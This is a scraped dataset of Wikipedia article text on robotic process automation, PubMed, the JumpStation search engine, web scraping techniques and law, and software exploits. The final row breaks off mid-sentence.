294 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Robotic_process_automation | Robotic process automation (RPA) is a form of business process automation that is based on software robots (bots) or artificial intelligence (AI) agents. 1 RPA should not be confused with artificial intelligence as it is based on automotive technology following a predefined workflow. 2 It is sometimes referred to as software robotics (not to be confused with robot software). In traditional workflow automation tools, a software developer produces a list of actions to automate a task and interface to the back end system using internal application programming interfaces (APIs) or dedicated scripting language. In contrast, RPA systems develop the action list by watching the user perform that task in the application's graphical user interface (GUI), and then perform the automation by repeating those tasks directly in the GUI. This can lower the barrier to the use of automation in products that might not otherwise feature APIs for this purpose. RPA tools have strong technical similarities to graphical user interface testing tools. These tools also automate interactions with the GUI, and often do so by repeating a set of demonstration actions performed by a user. RPA tools differ from such systems in that they allow data to be handled in and between multiple applications, for instance, receiving email containing an invoice, extracting the data, and then typing that into a bookkeeping system. The typical benefits of robotic automation include reduced cost; increased speed, accuracy, and consistency; improved quality and scalability of production. Automation can also provide extra security, especially for sensitive data and financial services. As a form of automation, the concept has been around for a long time in the form of screen scraping, which can be traced back to early forms of malware ambiguous . However, RPA is much more extensible, consisting of API integration into other enterprise applications, connectors into ITSM systems, terminal services and even some types of AI (e.g. machine learning) services such as image recognition. It is considered to be a significant technological evolution in the sense that new software platforms are emerging which are sufficiently mature, resilient, scalable and reliable to make this approach viable for use in large enterprises 3 (who would otherwise be reluctant due to perceived risks to quality and reputation). A principal barrier to the adoption of self-service is often technological: it may not always be feasible or economically viable to retrofit new interfaces onto existing systems. Moreover, organisations may wish to layer a variable and configurable set of process rules on top of the system interfaces which may vary according to market offerings and the type of customer. This only adds to the cost and complexity of the technological implementation. Robotic automation software provides a pragmatic means of deploying new services in this situation, where the robots simply mimic the behaviour of humans to perform the back-end transcription or processing. The relative affordability of this approach arises from the fact that no new IT transformation or investment is required; instead the software robots simply leverage greater use out of existing IT assets. The hosting of RPA services also aligns with the metaphor of a software robot, with each robotic instance having its own virtual workstation, much like a human worker. The robot uses keyboard and mouse controls to take actions and execute automations. Normally all of these actions take place in a virtual environment and not on screen; the robot does not need a physical screen to operate, rather it interprets the screen display electronically. The scalability of modern solutions based on architectures such as these owes much to the advent of virtualization technology, without which the scalability of large deployments would be limited by the available capacity to manage physical hardware and by the associated costs. The implementation of RPA in business enterprises has shown dramatic cost savings when compared to traditional non-RPA solutions. 4 There are however several risks with RPA. Criticism includes risks of stifling innovation and creating a more complex maintenance environment of existing software that now needs to consider the use of graphical user interfaces in a way they weren't intended to be used. 5 According to Harvard Business Review, most operations groups adopting RPA have promised their employees that automation would not result in layoffs. 6 Instead, workers have been redeployed to do more interesting work. One academic study highlighted that knowledge workers did not feel threatened by automation: they embraced it and viewed the robots as team-mates. 7 The same study highlighted that, rather than resulting in a lower "headcount", the technology was deployed in such a way as to achieve more work and greater productivity with the same number of people. Conversely, however, some analysts proffer that RPA represents a threat to the business process outsourcing (BPO) industry. 8 The thesis behind this notion is that RPA will enable enterprises to "repatriate" processes from offshore locations into local data centers, with the benefit of this new technology. The effect, if true, will be to create high-value jobs for skilled process designers in onshore locations (and within the associated supply chain of IT hardware, data center management, etc.) but to decrease the available opportunity to low-skilled workers offshore. On the other hand, this discussion appears to be healthy ground for debate as another academic study was at pains to counter the so-called "myth" that RPA will bring back many jobs from offshore. 7 Academic studies 9 10 project that RPA, among other technological trends, is expected to drive a new wave of productivity and efficiency gains in the global labour market. Although not directly attributable to RPA alone, Oxford University conjectures that up to 35% of all jobs might be automated by 2035. 9 There are geographic implications to the trend in robotic automation. In the example above where an offshored process is "repatriated" under the control of the client organization (or even displaced by a business process outsourcer) from an offshore location to a data centre, the impact will be a deficit in economic activity to the offshore location and an economic benefit to the originating economy. On this basis, developed economies with skills and technological infrastructure to develop and support a robotic automation capability can be expected to achieve a net benefit from the trend. In a TEDx talk 11 hosted by University College London (UCL), entrepreneur David Moss explains that digital labour in the form of RPA is likely to revolutionize the cost model of the services industry by driving the price of products and services down, while simultaneously improving the quality of outcomes and creating increased opportunity for the personalization of services. In a separate TEDx in 2019 talk, 12 Japanese business executive, and former CIO of Barclays bank, Koichi Hasegawa noted that digital robots can be a positive effect on society if we start using a robot with empathy to help every person. He provides a case study of the Japanese insurance companies Sompo Japan and Aioi both of whom introduced bots to speed up the process of insurance pay-outs in past massive disaster incidents. Meanwhile, Professor Willcocks, author of the LSE paper 10 cited above, speaks of increased job satisfaction and intellectual stimulation, characterising the technology as having the ability to "take the robot out of the human", 13 a reference to the notion that robots will take over the mundane and repetitive portions of people's daily workload, leaving them to be used in more interpersonal roles or to concentrate on the remaining, more meaningful, portions of their day. It was also found in a 2021 study observing the effects of robotization in Europe that, the gender pay gap increased at a rate of .18% for every 1% increase in robotization of a given industry. 14 Unassisted RPA, or RPAAI, 15 16 is the next generation of RPA related technologies. Technological advancements around artificial intelligence allow a process to be run on a computer without needing input from a user. Hyperautomation is the application of advanced technologies like RPA, artificial intelligence, machine learning (ML) and process mining to augment workers and automate processes in ways that are significantly more impactful than traditional automation capabilities. 17 18 19 Hyperautomation is the combination of automation tools to deliver work. 20 Gartner's report notes that this trend was kicked off with robotic process automation (RPA). The report notes that, "RPA alone is not hyperautomation. Hyperautomation requires a combination of tools to help support replicating pieces of where the human is involved in a task. 21 Back office clerical processes outsourced by large organisations - particularly those sent offshore - tend to be simple and transactional in nature, requiring little (if any) analysis or subjective judgement. This would seem to make an ideal starting point for organizations beginning to adopt robotic automation for the back office. Whether client organisations choose to take outsourced processes back "in house" from their business process outsourcing (BPO) providers, thus representing a threat to the future of the BPO business, 22 or whether the BPOs implement such automations on their clients' behalf may well depend on a number of factors. Conversely however, a BPO provider may seek to effect some form of client lock-in by means of automation. By removing cost from a business operation, where the BPO provider is considered to be the owner of the intellectual property and physical implementation of a robotic automation solution (perhaps in terms of hardware, ownership of software licences, etc.), the provider can make it very difficult for the client to take a process back "in house" or elect a new BPO provider. This effect occurs as the associated cost savings made through automation would - temporarily at least - have to be reintroduced to the business whilst the technical solution is reimplemented in the new operational context. The geographically agnostic nature of software means that new business opportunities may arise for those organisations that have a political or regulatory impediment to offshoring or outsourcing. A robotised automation can be hosted in a data centre in any jurisdiction and this has two major consequences for BPO providers. Firstly, for example, a sovereign government may not be willing or legally able to outsource the processing of tax affairs and security administration. On this basis, if robots are compared to a human workforce, this creates a genuinely new opportunity for a "third sourcing" option, after the choices of onshore vs. offshore. Secondly, and conversely, BPO providers have previously relocated outsourced operations to different political and geographic territories in response to changing wage inflation and new labor arbitrage opportunities elsewhere. By contrast, a data centre solution would seem to offer a fixed and predictable cost base that, if sufficiently low in cost on a robot vs. human basis, would seem to eliminate any potential need or desire to continually relocate operational bases. While robotic process automation has many benefits including cost efficiency and consistency in performance, it also has some limitations. Current RPA solutions demand continual technical support to handle system changes, therefore it lacks the ability to autonomously adapt to new conditions. Because of this limitation, the system sometimes needs manual reconfiguration, which in turn has an effect on efficiency. 23 RPA is based on automotive technology following a predefined workflow, and artificial intelligence is data-driven and focuses on processing information to make predictions. Therefore there is a distinct difference between how the two systems operate. AI aims to mimic human intelligence, whereas RPA is focused on reproducing tasks that are typically human-directed. 24 Moreover, RPA could also be explained as virtual robots that take over routinized human work, it can identify data by interpreting the underlying tags. RPA, therefore, is based on machine learning, whereas AI utilizes self-learning technologies. 25 |
295 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/PMID_(identifier) | PubMed is a free database including primarily the MEDLINE database of references and abstracts on life sciences and biomedical topics. The United States National Library of Medicine (NLM) at the National Institutes of Health maintains the database as part of the Entrez system of information retrieval. 1 From 1971 to 1997, online access to the MEDLINE database had been primarily through institutional facilities, such as university libraries. 2 PubMed, first released in January 1996, ushered in the era of private, free, home- and office-based MEDLINE searching. 3 The PubMed system was offered free to the public starting in June 1997. 2 In addition to MEDLINE, PubMed provides access to: Many PubMed records contain links to full text articles, some of which are freely available, often in PubMed Central 5 and local mirrors, such as Europe PubMed Central. 6 Information about the journals indexed in MEDLINE, and available through PubMed, is found in the NLM Catalog. 7 As of 23 May 2023 update , PubMed has more than 35 million citations and abstracts dating back to 1966, selectively to the year 1865, and very selectively to 1809. As of the same date update , 24.6 million of PubMed's records are listed with their abstracts, and 26.8 million records have links to full-text versions (of which 10.9 million articles are available, full-text for free). 8 Over the last 10 years (ending 31 December 2019), an average of nearly one million new records were added each year. In 2016, NLM changed the indexing system so that publishers are able to directly correct typos and errors in PubMed indexed articles. 9 PubMed has been reported to include some articles published in predatory journals. MEDLINE and PubMed policies for the selection of journals for database inclusion are slightly different. Weaknesses in the criteria and procedures for indexing journals in PubMed Central may allow publications from predatory journals to leak into PubMed. 10 A new PubMed interface was launched in October 2009 and encouraged the use of such quick, Google-like search formulations; they have also been described as 'telegram' searches. 11 By default the results are sorted by Most Recent, but this can be changed to Best Match, Publication Date, First Author, Last Author, Journal, or Title. 12 The PubMed website design and domain was updated in January 2020 and became default on 15 May 2020, with the updated and new features. 13 There was a critical reaction from many researchers who frequently use the site. 14 PubMed MEDLINE can be accessed via handheld devices, using for instance the "PICO" option (for focused clinical questions) created by the NLM. 15 A "PubMed Mobile" option, providing access to a mobile friendly, simplified PubMed version, is also available. 16 Simple searches on PubMed can be carried out by entering key aspects of a subject into PubMed's search window. PubMed translates this initial search formulation and automatically adds field names, relevant MeSH (Medical Subject Headings) terms, synonyms, Boolean operators, and 'nests' the resulting terms appropriately, enhancing the search formulation significantly, in particular by routinely combining (using the OR operator) textwords and MeSH terms. citation needed The examples given in a PubMed tutorial 17 demonstrate how this automatic process works: Causes Sleep Walking is translated as ("etiology" Subheading OR "etiology" All Fields OR "causes" All Fields OR "causality" MeSH Terms OR "causality" All Fields ) AND ("somnambulism" MeSH Terms OR "somnambulism" All Fields OR ("sleep" All Fields AND "walking" All Fields ) OR "sleep walking" All Fields ) Likewise, soft Attack Aspirin Prevention is translated as ("myocardial infarction" MeSH Terms OR ("myocardial" All Fields AND "infarction" All Fields ) OR "myocardial infarction" All Fields OR ("heart" All Fields AND "attack" All Fields ) OR "heart attack" All Fields ) AND ("aspirin" MeSH Terms OR "aspirin" All Fields ) AND ("prevention and control" Subheading OR ("prevention" All Fields AND "control" All Fields ) OR "prevention and control" All Fields OR "prevention" All Fields ) For optimal searches in PubMed, it is necessary to understand its core component, MEDLINE, and especially of the MeSH (Medical Subject Headings) controlled vocabulary used to index MEDLINE articles. They may also require complex search strategies, use of field names (tags), proper use of limits and other features; reference librarians and search specialists offer search services. 18 19 The search into PubMed's search window is only recommended for the search of unequivocal topics or new interventions that do not yet have a MeSH heading created, as well as for the search for commercial brands of medicines and proper nouns. It is also useful when there is no suitable heading or the descriptor represents a partial aspect. The search using the thesaurus MeSH is more accurate and will give fewer irrelevant results. In addition, it saves the disadvantage of the free text search in which the spelling, singular plural or abbreviated differences have to be taken into consideration. On the other side, articles more recently incorporated into the database to which descriptors have not yet been assigned will not be found. Therefore, to guarantee an exhaustive search, a combination of controlled language headings and free text terms must be used. 20 When a journal article is indexed, numerous article parameters are extracted and stored as structured information. Such parameters are: Article Type (MeSH terms, e.g., "Clinical Trial"), Secondary identifiers, (MeSH terms), Language, Country of the Journal or publication history (e-publication date, print journal publication date). Publication type parameter allows searching by the type of publication, including reports of various kinds of clinical research. 21 Since July 2005, the MEDLINE article indexing process extracts identifiers from the article abstract and puts those in a field called Secondary Identifier (SI). The secondary identifier field is to store accession numbers to various databases of molecular sequence data, gene expression or chemical compounds and clinical trial IDs. For clinical trials, PubMed extracts trial IDs for the two largest trial registries: ClinicalTrials.gov (NCT identifier) and the International Standard Randomized Controlled Trial Number Register (IRCTN identifier). 22 A reference which is judged particularly relevant can be marked and "related articles" can be identified. If relevant, several studies can be selected and related articles to all of them can be generated (on PubMed or any of the other NCBI Entrez databases) using the 'Find related data' option. The related articles are then listed in order of "relatedness". To create these lists of related articles, PubMed compares words from the title and abstract of each citation, as well as the MeSH headings assigned, using a powerful word-weighted algorithm. 23 The 'related articles' function has been judged to be so precise that the authors of a paper suggested it can be used instead of a full search. 24 PubMed automatically links to MeSH terms and subheadings. Examples would be: "bad breath" links to (and includes in the search) "halitosis", "heart attack" to "myocardial infarction", "breast cancer" to "breast neoplasms". Where appropriate, these MeSH terms are automatically "expanded", that is, include more specific terms. Terms like "nursing" are automatically linked to "Nursing MeSH or "Nursing Subheading . This feature is called Auto Term Mapping and is enacted, by default, in free text searching but not exact phrase searching (i.e. enclosing the search query with double quotes). 25 This feature makes PubMed searches more sensitive and avoids false-negative (missed) hits by compensating for the diversity of medical terminology. 25 PubMed does not apply automatic mapping of the term in the following circumstances: by writing the quoted phrase (e.g., "kidney allograft"), when truncated on the asterisk (e.g., kidney allograft ), and when looking with field labels (e.g., Cancer ti ). 20 The PubMed optional facility "My NCBI" (with free registration) provides tools for and a wide range of other options. 26 The "My NCBI" area can be accessed from any computer with web-access. An earlier version of "My NCBI" was called "PubMed Cubby". 27 LinkOut is an NLM facility to link and make available full-text local journal holdings. 28 Some 3,200 sites (mainly academic institutions) participate in this NLM facility (as of March 2010 update ), from Aalborg University in Denmark to ZymoGenetics in Seattle. 29 Users at these institutions see their institution's logo within the PubMed search result (if the journal is held at that institution) and can access the full-text. Link out is being consolidated with Outside Tool as of the major platform update coming in the Summer of 2019. 30 In 2016, PubMed allows authors of articles to comment on articles indexed by PubMed. This feature was initially tested in a pilot mode (since 2013) and was made permanent in 2016. 31 In February 2018, PubMed Commons was discontinued due to the fact that "usage has remained minimal". 32 33 askMEDLINE, a free-text, natural language query tool for MEDLINE PubMed, developed by the NLM, also suitable for handhelds. 34 A PMID (PubMed identifier or PubMed unique identifier) 35 is a unique integer value, starting at 1, assigned to each PubMed record. A PMID is not the same as a PMCID (PubMed Central identifier) which is the identifier for all works published in the free-to-access PubMed Central. 36 The assignment of a PMID or PMCID to a publication tells the reader nothing about the type or quality of the content. PMIDs are assigned to letters to the editor, editorial opinions, op-ed columns, and any other piece that the editor chooses to include in the journal, as well as peer-reviewed papers. The existence of the identification number is also not proof that the papers have not been retracted for fraud, incompetence, or misconduct. The announcement about any corrections to original papers may be assigned a PMID. Each number that is entered in the PubMed search window is treated by default as if it were a PMID. Therefore, any reference in PubMed can be located using the PMID. The National Library of Medicine leases the MEDLINE information to a number of private vendors such as Embase, Ovid, Dialog, EBSCO, Knowledge Finder and many other commercial, non-commercial, and academic providers. 37 As of October 2008 update , more than 500 licenses had been issued, more than 200 of them to providers outside the United States. As licenses to use MEDLINE data are available for free, the NLM in effect provides a free testing ground for a wide range 38 of alternative interfaces and 3rd party additions to PubMed, one of a very few large, professionally curated databases which offers this option. Lu identifies a sample of 28 current and free Web-based PubMed versions, requiring no installation or registration, which are grouped into four categories: 38 As most of these and other alternatives rely essentially on PubMed MEDLINE data leased under license from the NLM PubMed, the term "PubMed derivatives" has been suggested. 38 Without the need to store about 90 GB of original PubMed Datasets, anybody can write PubMed applications using the eutils-application program interface as described in "The E-utilities In-Depth: Parameters, Syntax and More", by Eric Sayers, PhD. 49 Various citation format generators, taking PMID numbers as input, are examples of web applications making use of the eutils-application program interface. Sample web pages include Citation Generator Mick Schroeder, Pubmed Citation Generator Ultrasound of the Week, PMID2cite, and Cite this for me. Alternative methods to mine the data in PubMed use programming environments such as Matlab, Python or R. In these cases, queries of PubMed are written as lines of code and passed to PubMed and the response is then processed directly in the programming environment. Code can be automated to systematically query with different keywords such as disease, year, organs, etc. In addition to its traditional role as a biomedical database, PubMed has become common resource for training biomedical language models. 50 Recent advancements in this field include the development of models like PubMedGPT, a 2.7B parameter model trained on PubMed data by Stanford CRFM, and Microsoft's BiomedCLIP-PubMedBERT, which utilizes figure-caption pairs from PubMed Central for vision-language processing. These models demonstrate the significant potential of PubMed data in enhancing the capabilities of AI in medical research and healthcare applications. Such advancements underline the growing intersection between large-scale data mining and AI development in the biomedical field. The data accessible by PubMed can be mirrored locally using an unofficial tool such as MEDOC. 51 Millions of PubMed records augment various open data datasets about open access, like Unpaywall. Data analysis tools like Unpaywall Journals are used by libraries to assist with big deal cancellations: libraries can avoid subscriptions for materials already served by instant open access via open archives like PubMed Central. 52 |
296 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/JumpStation | JumpStation was the first WWW search engine that behaved, and appeared to the user, the way current web search engines do. 1 It started indexing on 12 December 1993 2 and was announced on the Mosaic "What's New" webpage on 21 December 1993. 3 It was hosted at the University of Stirling in Scotland. It was written by Jonathon Fletcher, from Scarborough, England, 4 5 who graduated from the University with a first class honours degree in Computing Science in the summer of 1992 6 and has subsequently been named "father of the search engine". 7 He was subsequently employed there as a systems administrator. JumpStation's development discontinued when he left the University in late 1994, having failed to get any investors, including the University of Stirling, to financially back his idea. 6 At this point the database had 275,000 entries spanning 1,500 servers. 8 JumpStation used document titles and headings to index the web pages found using a simple linear search, and did not provide any ranking of results. 8 9 However, JumpStation had the same basic shape as Google Search in that it used an index solely built by a web robot, searched this index using keyword queries entered by the user on a web form whose location was well-known, 10 and presented its results in the form of a list of URLs that matched those keywords. JumpStation was nominated for a "Best Of The Web" award in 1994 11 and the story of its origin and development written up, using interviews with Fletcher, by Wishart and Bochsler. 12 |
297 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-7 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
298 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Exploit_(computer_security) | An exploit is a method or piece of code that takes advantage of vulnerabilities in software, applications, networks, operating systems, or hardware, typically for malicious purposes. The term "exploit" derives from the English verb "to exploit, meaning "to use something to one’s own advantage. Exploits are designed to identify flaws, bypass security measures, gain unauthorized access to systems, take control of systems, install malware, or steal sensitive data. While an exploit by itself may not be a malware, it serves as a vehicle for delivering malicious software by breaching security controls. 1 2 3 4 Exploits target vulnerabilities, which are essentially flaws or weaknesses in a system's defenses. Common targets for exploits include operating systems, web browsers, and various applications, where hidden vulnerabilities can compromise the integrity and security of computer systems. Exploits can cause unintended or unanticipated behavior in systems, potentially leading to severe security breaches. 5 6 Many exploits are designed to provide superuser-level access to a computer system. Attackers may use multiple exploits in succession to first gain low-level access and then escalate privileges repeatedly until they reach the highest administrative level, often referred to as "root. This technique of chaining several exploits together to perform a single attack is known as an exploit chain. Exploits that remain unknown to everyone except the individuals who discovered and developed them are referred to as zero-day or "0day" exploits. After an exploit is disclosed to the authors of the affected software, the associated vulnerability is often fixed through a patch, rendering the exploit unusable. This is why some black hat hackers, as well as military or intelligence agency hackers, do not publish their exploits but keep them private. One scheme that offers zero-day exploits is known as exploit as a service. 7 Researchers estimate that malicious exploits cost the global economy over US$450 billion annually. In response to this threat, organizations are 